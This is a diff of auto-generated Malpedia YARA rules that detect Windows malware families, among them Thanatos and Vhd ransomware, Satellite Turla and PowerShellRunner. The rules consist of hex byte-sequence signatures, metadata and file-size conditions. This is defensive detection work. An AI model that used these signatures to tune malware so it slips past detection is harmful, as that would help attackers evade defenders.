+		$sequence_22 = { 6a00 ff7628 ff15???????? 6a01 ff7620 ff15???????? 8b4e04 }
+		$sequence_23 = { 8bce ff75e8 e8???????? 8bce e8???????? 6a00 }
+		$sequence_24 = { ff15???????? 6800000002 6a00 6a00 ff15???????? }
+		$sequence_25 = { 6a00 6a00 6838040000 6a00 6a00 }
+		$sequence_26 = { 83e9fc c7014c696272 83e9fc c70161727941 83e9fc c70100000000 }
+		$sequence_27 = { 8b4608 8b7e20 8b36 813f6b006500 7406 813f4b004500 75e8 }
+		$sequence_28 = { ff8b8d60ffff ff03 0c90 898df4feffff }
+		$sequence_29 = { 8b4df0 51 8b9558ffffff 52 8b8560ffffff 50 }
+		$sequence_30 = { 83c40c c7856cffffff00000000 eb0f 8b8d6cffffff 83c101 }
+		$sequence_31 = { 03480c 894dc0 8b55c0 52 8b450c }
+		$sequence_32 = { 8d9530ffffff 52 6a40 8b4580 }
+		$sequence_33 = { 8b423c 8945ec 8b8d58ffffff 034dec }
 
 	condition:
-		7 of them and filesize < 100352
+		7 of them and filesize < 357376
 }
-rule MALPEDIA_Win_Floxif_Auto : FILE
+rule MALPEDIA_Win_Unidentified_006_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ffd7b18b-df79-5e10-a446-739ad37f5cd1"
+		id = "97d4c257-a67c-55d3-ab2d-8345f8133abc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.floxif_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_006_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "ea5402045cc061612aa202cf5adc4c091c680ec32b64c798623434387b1d2b20"
+		logic_hash = "e5d463a76ca11d9b4f7e0289dbf185a64b45114b95835b2526afa161b71d15ae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110363,32 +110467,32 @@ rule MALPEDIA_Win_Floxif_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 837dfc05 7e02 eb0d 68a00f0000 ff15???????? }
-		$sequence_1 = { eb09 8b45a8 83c001 8945a8 8d4dc0 e8???????? 3945a8 }
-		$sequence_2 = { 68???????? 8d4de0 e8???????? 68???????? b9???????? e8???????? 6a00 }
-		$sequence_3 = { e8???????? 8d4d08 51 8d4de4 e8???????? c645f400 }
-		$sequence_4 = { 51 8b55f4 52 8b45fc 50 6aff 8b4d08 }
-		$sequence_5 = { 837df800 7e68 8b45f8 83c001 50 6a00 8d8d4cffffff }
-		$sequence_6 = { c6855fffffff94 c68560ffffff92 c68561ffffffe1 c6458c00 c6458d00 c6458e72 }
-		$sequence_7 = { e8???????? e8???????? 83c410 682c010000 ff15???????? e8???????? 83ec10 }
-		$sequence_8 = { 83c40c 8b5510 52 8b450c c1e004 8b4d08 03c8 }
-		$sequence_9 = { 7629 a1???????? 0305???????? 8b4d0c 3981b8000000 7313 }
+		$sequence_0 = { 817c0afc54494b46 750c 83c2fc e8???????? }
+		$sequence_1 = { 83c603 25ff000000 30041a 42 3bd1 72df }
+		$sequence_2 = { 7410 8b55f4 85d2 7409 e8???????? }
+		$sequence_3 = { 59 84db 750d 85f6 7416 56 e8???????? }
+		$sequence_4 = { 85db 0f840a010000 56 ff75ec }
+		$sequence_5 = { 1bc0 23f8 0fb6875c204000 47 03c6 83c603 }
+		$sequence_6 = { 56 e8???????? 59 eb0d 8b45e8 8b4d08 }
+		$sequence_7 = { 85c0 7529 8b4dfc 85c9 }
+		$sequence_8 = { 832600 832700 6a06 ebba }
+		$sequence_9 = { 50 ff75ec 8bfb ff15???????? 85c0 }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Bredolab_Auto : FILE
+rule MALPEDIA_Win_Thanatos_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9ae7558-41e9-5f48-a345-a8a0a59274ec"
+		id = "36dfbc1b-2a7c-5015-aa84-898c9ae8a989"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bredolab_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.thanatos_ransom_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "b7fcc4ad5e8f568651dead1485597f16282b873ba030d633458bd92c7562859d"
+		logic_hash = "0a185fa4c8cc02cde8300ce206abe6802953ff20e929d9c3889dfecd7dc1e60f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110402,32 +110506,32 @@ rule MALPEDIA_Win_Bredolab_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 55 89e5 56 53 8b5508 8b4d0c }
-		$sequence_1 = { 75be 8b8348080000 40 898348080000 }
-		$sequence_2 = { 7424 8b5514 c60200 8d85e0f7ffff 89442404 c7042400080000 ff15???????? }
-		$sequence_3 = { 89853cfcffff ff15???????? 51 66c78560ffffff0800 c744240408020000 c7042400000000 ff15???????? }
-		$sequence_4 = { c7834808000000000000 c7442404???????? 8d4314 890424 ff15???????? }
-		$sequence_5 = { ff15???????? 57 57 8b45e4 89442404 8b4510 890424 }
-		$sequence_6 = { 895c2424 89542420 c744241c00000000 c744241800000000 }
-		$sequence_7 = { 84c0 75f6 894d14 8b5d14 c60300 8b4d0c 8b8560ffffff }
-		$sequence_8 = { 8b450c 8b5510 8d1c07 85c0 740a 807bff3f 7404 }
-		$sequence_9 = { 89d6 31db 6690 80be5409000000 7523 b030 }
+		$sequence_0 = { 837f1410 7240 8b4714 8b0f 40 3d00100000 722a }
+		$sequence_1 = { 50 e8???????? 83ec18 c645fc13 8bcc c741140f000000 c7411000000000 }
+		$sequence_2 = { f20f591c8580e94200 f20f592c8580e94200 03c0 660f58348590ed4200 660f5625???????? f20f58f0 }
+		$sequence_3 = { 6bc930 f6451402 8b0485e0774300 c644082900 }
+		$sequence_4 = { c64405e800 40 83f804 7cef 33f6 0f1f440000 8a4435e8 }
+		$sequence_5 = { c645fc14 8d4dd8 e8???????? 83c404 68???????? 8bd0 }
+		$sequence_6 = { 8b7508 8bce 68b8020000 68???????? c745fc00000000 }
+		$sequence_7 = { e8???????? 83c404 c645fc12 8b45ec c745d40f000000 c745d000000000 c645c000 }
+		$sequence_8 = { 43 837e1410 7204 8b06 eb02 }
+		$sequence_9 = { 83f81d 7cf1 eb07 8b0cc544be4200 894de4 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 516096
 }
-rule MALPEDIA_Win_Aveo_Auto : FILE
+rule MALPEDIA_Win_Bee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "58fed8b1-4a4c-5644-af15-f834ce14a282"
+		id = "a6f6643e-0c7d-5aa3-acb3-5d655dc4ed63"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aveo_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bee_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "50253623bc7141d72df42bdf99f9bb3131c73cf858d2c7872df300d67b84cd17"
+		logic_hash = "d470260abf875100cc9eec94a5fc9a99328d8a9951c079ae2b41e9596561de11"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110441,32 +110545,32 @@ rule MALPEDIA_Win_Aveo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894804 894808 89480c b9???????? 8d7901 8a11 41 }
-		$sequence_1 = { 68???????? e8???????? 83c404 899df4fdffff eb06 89b5f4fdffff 68???????? }
-		$sequence_2 = { 52 50 8d9df8feffff e8???????? }
-		$sequence_3 = { 8d8dfcefffff 51 8bf8 e8???????? 33ff 39bdf4efffff }
-		$sequence_4 = { e8???????? 83c40c 8d842418010000 50 8d8c241c030000 }
-		$sequence_5 = { b9???????? 8d7901 8a11 41 84d2 75f9 2bcf }
-		$sequence_6 = { 8db590fdffff 898574fdffff e8???????? be00100000 }
-		$sequence_7 = { 50 e8???????? 8d8df4f9ffff 51 8d95f4feffff 52 }
-		$sequence_8 = { 6803800000 50 ff15???????? 8b4de8 6a00 6a05 }
-		$sequence_9 = { 51 e8???????? 8b4df8 83c404 5f }
+		$sequence_0 = { 68???????? c706???????? 895618 6689461c 66894e1e ff15???????? }
+		$sequence_1 = { 3bee 7462 8a46b4 83ee50 83ef50 884704 }
+		$sequence_2 = { 83c404 8b8534ffffff 8d0cb6 8d1492 c1e104 03c8 }
+		$sequence_3 = { b8???????? e8???????? 8b15???????? 3bd3 7504 33c9 }
+		$sequence_4 = { ebc9 8bc8 c1f905 8d1c8d00534200 8bf8 83e71f c1e706 }
+		$sequence_5 = { ffd0 8b4c2410 64890d00000000 59 5f 5e 83c410 }
+		$sequence_6 = { e8???????? 83c404 8b4e7c 51 899e88000000 899e8c000000 899e90000000 }
+		$sequence_7 = { 50 8d4c2438 51 8d4c2444 }
+		$sequence_8 = { 8d442440 64a300000000 8bf9 833d????????10 a1???????? }
+		$sequence_9 = { 7639 0fb654240c 0fb644240d 0fb6c9 034c2414 03c2 }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 394240
 }
-rule MALPEDIA_Win_Frozenhill_Auto : FILE
+rule MALPEDIA_Win_Satellite_Turla_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "67a93804-b581-5120-9731-01f5ce053d83"
+		id = "db4c3339-c415-5711-a90e-cee07a736590"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.frozenhill"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.frozenhill_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.satellite_turla_auto.yar#L1-L159"
 		license_url = "N/A"
-		logic_hash = "f77792066de7c23219a214fc531000b7de62e743dbb704f0fcc9770a904b8873"
+		logic_hash = "1f8986d8ff44bcaea791aed8e9d7780e6a84fb5d73ce994c684beebfa03d07bc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110480,32 +110584,38 @@ rule MALPEDIA_Win_Frozenhill_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8be5 5d c3 1b9b0e10769b 0e 10d1 9b }
-		$sequence_1 = { ff7508 8d85c8f7ffff 50 ff15???????? 3bf4 }
-		$sequence_2 = { 8d85f4feffff 3985e8feffff 7436 8b85e8feffff 0fbe08 83f95c 7428 }
-		$sequence_3 = { 05???????? 50 e8???????? 83c404 ebda 5f 5e }
-		$sequence_4 = { f3ab a1???????? 33c5 8945fc b9???????? e8???????? 6a73 }
-		$sequence_5 = { 8bf4 8b4508 8b4808 51 8b55f8 81c2300c0000 52 }
-		$sequence_6 = { 8bf4 8d85f0fdffff 50 6804010000 ff15???????? 3bf4 }
-		$sequence_7 = { b874000000 66894586 b85c000000 66894588 b857000000 6689458a b869000000 }
-		$sequence_8 = { 5b 8b4df0 33cd e8???????? 81c480030000 }
-		$sequence_9 = { 8945fc b9???????? e8???????? c745f400000000 c745e800000000 c745dc00000000 c745d000000000 }
+		$sequence_0 = { 0108 833e00 7c1f 8b542410 }
+		$sequence_1 = { 0105???????? 81c3b0020000 2945e0 75ae 837dd400 }
+		$sequence_2 = { 0105???????? 83c410 29442418 75a9 }
+		$sequence_3 = { 0108 833e00 7fc7 db46fc }
+		$sequence_4 = { 0105???????? 83c410 29442420 75aa }
+		$sequence_5 = { 0108 833a00 7c23 8b442428 }
+		$sequence_6 = { 51 8d951cffffff 52 eb2b 8b4d20 }
+		$sequence_7 = { 0108 833e00 7cc7 7e39 }
+		$sequence_8 = { 66ab aa 8b3d???????? 8d85f0feffff 56 }
+		$sequence_9 = { ffd7 53 56 ff15???????? 6a02 53 56 }
+		$sequence_10 = { ff15???????? ff45fc 817dfc88130000 7cb7 }
+		$sequence_11 = { c645d205 c645d337 c645d418 c645d51d c645d614 c645d722 }
+		$sequence_12 = { e8???????? ff75fc 8945f8 53 50 e8???????? }
+		$sequence_13 = { 57 ffd6 a3???????? 6a71 8d45d0 }
+		$sequence_14 = { c645b816 c645b927 c645ba30 c645bb34 c645bc21 c645bd30 }
+		$sequence_15 = { 8d45c4 885dcf 50 57 }
 
 	condition:
-		7 of them and filesize < 2652160
+		7 of them and filesize < 1040384
 }
-rule MALPEDIA_Win_Bee_Auto : FILE
+rule MALPEDIA_Win_Tropidoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a6f6643e-0c7d-5aa3-acb3-5d655dc4ed63"
+		id = "8fc3955f-94d9-559f-8d24-ed4a0dad546e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bee_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tropidoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tropidoor_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "d470260abf875100cc9eec94a5fc9a99328d8a9951c079ae2b41e9596561de11"
+		logic_hash = "0cca80e99bb2477fcd1d7242d291a5d298649d488754cf8d2858779b90f27265"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110519,32 +110629,32 @@ rule MALPEDIA_Win_Bee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? c706???????? 895618 6689461c 66894e1e ff15???????? }
-		$sequence_1 = { 3bee 7462 8a46b4 83ee50 83ef50 884704 }
-		$sequence_2 = { 83c404 8b8534ffffff 8d0cb6 8d1492 c1e104 03c8 }
-		$sequence_3 = { b8???????? e8???????? 8b15???????? 3bd3 7504 33c9 }
-		$sequence_4 = { ebc9 8bc8 c1f905 8d1c8d00534200 8bf8 83e71f c1e706 }
-		$sequence_5 = { ffd0 8b4c2410 64890d00000000 59 5f 5e 83c410 }
-		$sequence_6 = { e8???????? 83c404 8b4e7c 51 899e88000000 899e8c000000 899e90000000 }
-		$sequence_7 = { 50 8d4c2438 51 8d4c2444 }
-		$sequence_8 = { 8d442440 64a300000000 8bf9 833d????????10 a1???????? }
-		$sequence_9 = { 7639 0fb654240c 0fb644240d 0fb6c9 034c2414 03c2 }
+		$sequence_0 = { 488b8d88010000 488b01 ff5010 488b8d80010000 e9???????? 6644897508 897510 }
+		$sequence_1 = { ff15???????? 0fb74c2420 b8b2070000 663bc8 731a ba01000000 }
+		$sequence_2 = { 488d9520020000 498bcf e8???????? 4d8b8598000000 4d85c0 0f84a2000000 ba04010000 }
+		$sequence_3 = { ffd0 85c0 7564 8b459c 83c0fe 413bc5 7725 }
+		$sequence_4 = { 488bcb ff15???????? 418bc4 4883c470 415e 415c 5f }
+		$sequence_5 = { ff15???????? e9???????? 8b542478 4c8d8510050000 c744243002000000 488d8db0000000 897c2428 }
+		$sequence_6 = { 33d2 41b801010000 e8???????? 418bc6 4d8d4c2410 4c8d1d75920300 41be04000000 }
+		$sequence_7 = { 83ff01 0f85d2000000 84c0 740a 458b949b3cb90a00 eb08 458b949b04b90a00 }
+		$sequence_8 = { 8b8c8220060200 4803ca ffe1 488b4c2430 418bc4 488b0cc1 48894c2458 }
+		$sequence_9 = { 4c8d4d40 4c8d052b630900 488d4db0 e8???????? 48897de0 488d45d0 4983fd10 }
 
 	condition:
-		7 of them and filesize < 394240
+		7 of them and filesize < 1826816
 }
-rule MALPEDIA_Win_Pitou_Auto : FILE
+rule MALPEDIA_Win_Vhd_Ransomware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f9c8da4e-505e-547b-8240-9df48ee9f72d"
+		id = "0a8c66bf-eb2b-583f-b44b-433c73c780b6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pitou_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vhd_ransomware_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "c7a5a733d5fc2416ed190ff88c1bcfd8fd875daba5df81cd77a3f96c787c1800"
+		logic_hash = "dae74c2bc008a70be0fd9b501245d9759dea529e108a1bf96ef7d1de1daf70f9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110558,32 +110668,32 @@ rule MALPEDIA_Win_Pitou_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bda c1e305 03c3 8bda }
-		$sequence_1 = { ac 8bda c1e305 03c3 8bda c1eb02 }
-		$sequence_2 = { 33c0 ac 8bda c1e305 03c3 }
-		$sequence_3 = { c1e305 03c3 8bda c1eb02 03c3 }
-		$sequence_4 = { 8a6201 80f457 8acc 80e103 }
-		$sequence_5 = { 8bda c1e305 03c3 8bda c1eb02 }
-		$sequence_6 = { 33c0 ac 8bda c1e305 }
-		$sequence_7 = { 8acc 80e103 8aec c0ed03 }
-		$sequence_8 = { 8a6201 80f457 8acc 80e103 8aec c0ed03 80e507 }
-		$sequence_9 = { 80e703 c0eb05 80e303 80ff00 }
+		$sequence_0 = { f3ab 8b8530030000 8902 33c0 89a54cf3ffff 398530030000 7e1b }
+		$sequence_1 = { e8???????? 81c44c060000 80bd7ff6ffff00 7424 8bb574f6ffff 8d8dd0fcffff }
+		$sequence_2 = { 33d3 8b5df4 0fb69b98744100 0fb61c9d9b854100 33d3 8b5df8 }
+		$sequence_3 = { 785b 8d74ba04 8b4e04 33c0 33db 0306 13cb }
+		$sequence_4 = { 83c8ff 5d c3 6a08 68???????? e8???????? e8???????? }
+		$sequence_5 = { 33c0 b9c8000000 8d7a04 f3ab 8b8dd0fcffff 890a 85c9 }
+		$sequence_6 = { 8945cc bf40000000 b8???????? 8d75e0 895dc8 c745f40f000000 c745f000000000 }
+		$sequence_7 = { 8bd8 899d28b4ffff 83fbff 0f8430010000 8b4510 8b4d0c 50 }
+		$sequence_8 = { 398530030000 7e14 8d4a04 8bb48534030000 8931 40 83c104 }
+		$sequence_9 = { 03c2 13ce 33d2 52 8b95f4efffff 52 51 }
 
 	condition:
-		7 of them and filesize < 1106944
+		7 of them and filesize < 275456
 }
-rule MALPEDIA_Win_Snojan_Auto : FILE
+rule MALPEDIA_Win_Mrac_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9f201807-eca2-5671-8fb1-4c54ce96e5b1"
+		id = "8e787bb3-4d81-533a-b44d-f20be9e2f442"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.snojan_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrac"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mrac_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "1d25311cfd419aa863c883b495c4bbb0986a7541ebe6286749992456a12c9723"
+		logic_hash = "5fe94aec6f3ba68621e3ca20e2c4449488e4dd8245ed859f8a76ad9159490f6c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110597,71 +110707,71 @@ rule MALPEDIA_Win_Snojan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d442bfc c744240804000000 c7442404???????? 890424 }
-		$sequence_1 = { 81c43c900100 31c0 5b 5e 5f }
-		$sequence_2 = { 8b4dc0 6689810000986d 83c30c 81fb???????? 0f8285feffff e9???????? }
-		$sequence_3 = { 83f8ff 0f8452010000 c7442404???????? c70424???????? e8???????? 85c0 89c6 }
-		$sequence_4 = { 31db eb02 89c3 8d4301 8b14859026986d 85d2 }
-		$sequence_5 = { e8???????? 29c4 c744240806000000 c744240401000000 c7042402000000 ff15???????? 83ec0c }
-		$sequence_6 = { 85c9 0f84c3feffff e9???????? 0fb7810000986d 894dc0 89c7 }
-		$sequence_7 = { 56 53 e8???????? 29c4 c744240806000000 c744240401000000 c7042402000000 }
-		$sequence_8 = { 7421 85db 740c ff149d9026986d 83eb01 75f4 }
-		$sequence_9 = { b8???????? e8???????? 85c0 74e9 a1???????? 8b988000986d }
+		$sequence_0 = { e8???????? 8bc8 e8???????? c78424780600001e000000 c684247c0600006a c684247d0600007f c684247e0600006d }
+		$sequence_1 = { 8bde 83e03f c1fb06 6bc830 8b049d804b4500 894dfc 837c0118ff }
+		$sequence_2 = { e8???????? 0420 8d8c2434040000 6a35 8884244f040000 e8???????? }
+		$sequence_3 = { 040f 3476 888424ef040000 8b8424dc040000 0410 3463 888424f0040000 }
+		$sequence_4 = { 8b4df0 8b048d804b4500 f644382848 741c 8a55ff 80fa0a 7504 }
+		$sequence_5 = { e8???????? c68424c813000076 c68424c91300006d c68424ca1300007c 8d8c24c8130000 c68424cb13000028 c68424cc1300007b }
+		$sequence_6 = { 8a840d6cffffff 2c0a 88840d6cffffff 41 83f909 72ea 68eeeac01f }
+		$sequence_7 = { 8bf0 c645e57d c645e675 c645e74a c645e86d c645e973 c645ea7e }
+		$sequence_8 = { 8d8c2458090000 88842466090000 e8???????? 3453 8d8c2454090000 6a0c 88842467090000 }
+		$sequence_9 = { c68424ce0e000049 c68424cf0e000056 c68424d00e000006 c68424d10e00006b c68424d20e000075 c68424d30e000075 c68424d40e000077 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 745472
 }
-rule MALPEDIA_Win_Unidentified_102_Auto : FILE
+rule MALPEDIA_Win_Fonix_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "68f5ede2-e772-5b9c-86c7-72da7d6ddaff"
-		date = "2023-07-11"
-		modified = "2023-07-15"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_102_auto.yar#L1-L130"
+		id = "830a78fe-5e83-5a5d-85e3-7068b4a16c64"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fonix_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "7cf959abf8b06a75a101a66334f27ae5601df812c1ddb140fd9298ef735bb0dc"
+		logic_hash = "f38caf2a92a21c38ad3b20bd93c5f2960092d1cc56de1072c080f008b7483511"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20230705"
-		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
-		malpedia_version = "20230715"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6bd238 8b0c8d187b0410 88441129 8b0b 8bc1 c1f806 }
-		$sequence_1 = { 83c408 8bb5e8fdffff 8dbdd8fdffff 83bdecfdffff10 c745b000000000 0f43bdd8fdffff }
-		$sequence_2 = { 8bf3 6bf938 c1fe06 6a00 8b0cb5187b0410 ff740f24 }
-		$sequence_3 = { 894610 c7461407000000 668906 e9???????? 837f1410 8bcf 7202 }
-		$sequence_4 = { c785e4fbffff07000000 8d5102 668985d0fbffff 6690 668b01 83c102 6685c0 }
-		$sequence_5 = { 8d85e8e7ffff 68???????? 50 ff15???????? 83c410 8d8594e7ffff 50 }
-		$sequence_6 = { 0f1085b0fcffff 0f1100 8bc4 0f108590fcffff 51 0f1100 ff5228 }
-		$sequence_7 = { 83c408 8b95dcfeffff 83fa10 722f 8b8dc8feffff 42 8bc1 }
-		$sequence_8 = { 6a00 68???????? 6802000080 c785c8e7ffff3f000f00 ff15???????? 85c0 0f84ef000000 }
-		$sequence_9 = { 8d45f4 64a300000000 8965f0 8b4510 8b4d18 8b5d0c }
+		$sequence_0 = { a801 8b04d560b74900 8b14d564b74900 7506 83c002 83ea02 5d }
+		$sequence_1 = { 59 59 8b471c 89461c 8bc6 5f }
+		$sequence_2 = { c645fc18 8d4dc4 8bd0 c70424???????? e8???????? 59 8d8d44fcffff }
+		$sequence_3 = { 8b16 50 ff5220 e9???????? e8???????? 8b75ac 83c404 }
+		$sequence_4 = { 8985a0f8ffff 0f85c5fcffff 8b8d8cf8ffff 85c9 0f84d3000000 8b048d2cdc4900 89858cf8ffff }
+		$sequence_5 = { 50 8d8de0feffff e8???????? 8d8dc8feffff e8???????? 8d8db0feffff e8???????? }
+		$sequence_6 = { 50 c745fc01000000 ff5248 ffb578ffffff 8d4e4c e8???????? ff7620 }
+		$sequence_7 = { 83e3fe e8???????? 807d6700 0f8413010000 6a01 8d4dac e8???????? }
+		$sequence_8 = { 8b45fc 0580000000 c5fe7f00 c5fe6f8560feffff c4e37d46458031 c5fe7f8580e5ffff c5fe6f8580e5ffff }
+		$sequence_9 = { 0f849c050000 6a01 8d8d50020000 e8???????? 6a01 8d4d8c c645fc0c }
 
 	condition:
-		7 of them and filesize < 626688
+		7 of them and filesize < 2226176
 }
-rule MALPEDIA_Win_Malumpos_Auto : FILE
+rule MALPEDIA_Win_Powershellrunner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cd78d99d-ded9-59a9-a898-9ec39f928aa5"
+		id = "6a02b05b-5544-5fd8-bda1-2b73877e66ff"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.malumpos_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powershellrunner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.powershellrunner_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "29cfae31eaa84f0f9fcc3ec276520376ec4d5f40c7104f5c7188971142f1d819"
+		logic_hash = "150515a586587c1b339d21af473c6cacdf2854e2b8551085b1787b23d2cc9d35"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110675,32 +110785,32 @@ rule MALPEDIA_Win_Malumpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b450c 3b38 731e 8bd9 }
-		$sequence_1 = { 59 56 8bf3 5e 56 }
-		$sequence_2 = { 8db408f8000000 8b4608 894568 3bc3 0f84d9000000 }
-		$sequence_3 = { 5a 66a9a02f fc f5 a1???????? 8b4015 6a04 }
-		$sequence_4 = { 5e 6685db 55 80c400 5d 56 }
-		$sequence_5 = { 59 7405 0d00000000 80ec00 }
-		$sequence_6 = { e8???????? 68???????? a3???????? ffd0 810d????????00200000 be???????? }
-		$sequence_7 = { 50 ff35???????? ff15???????? 817d6003010000 }
-		$sequence_8 = { 85c0 7446 8b400c 56 8b700c 68???????? 57 }
-		$sequence_9 = { 8d4520 50 ff15???????? 8d4520 }
